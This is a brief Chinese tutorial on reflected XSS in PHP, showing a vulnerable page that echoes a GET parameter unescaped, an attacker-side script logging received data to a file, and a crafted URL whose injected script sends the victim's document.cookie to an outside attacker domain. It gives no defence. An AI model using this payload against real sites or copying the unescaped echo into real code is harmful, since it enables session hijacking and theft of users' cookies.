PHP中XSS脚本攻击案例
XSS原理就是利用脚本在客户端(浏览器)执行,获取用户的cookie等信息。
www.test.com(被攻击)/域名下的index.php代码:
|
1 2 3 4 5 6 |
<html> <body> <?php echo $_GET['keyword']; ?> </body> </html> |
www.aaa.com(攻击者)/域名下的index.php代码:
|
1 2 3 4 5 |
<?php // $fp=fopen('1.txt','a+'); fwrite($fp,$_GET['content']."\r\n"); fclose($fp); |
用户通过访问链接:
http://www.test.com/index.php?keyword=<script type=text/javascript>var img = document.createElement(‘img’);img.width = 0;img.height = 0;img.src = ‘http://www.aaa.com/?content=’%2Bdocument.cookie;</script>
即将用户浏览器的cookie传递给攻击者,从而达到了获取他人信息的目的。
cookie:
1.txt:
请尊重我们的辛苦付出,未经允许,请不要转载 本站 的文章,鄙视各种无耻的采集行为!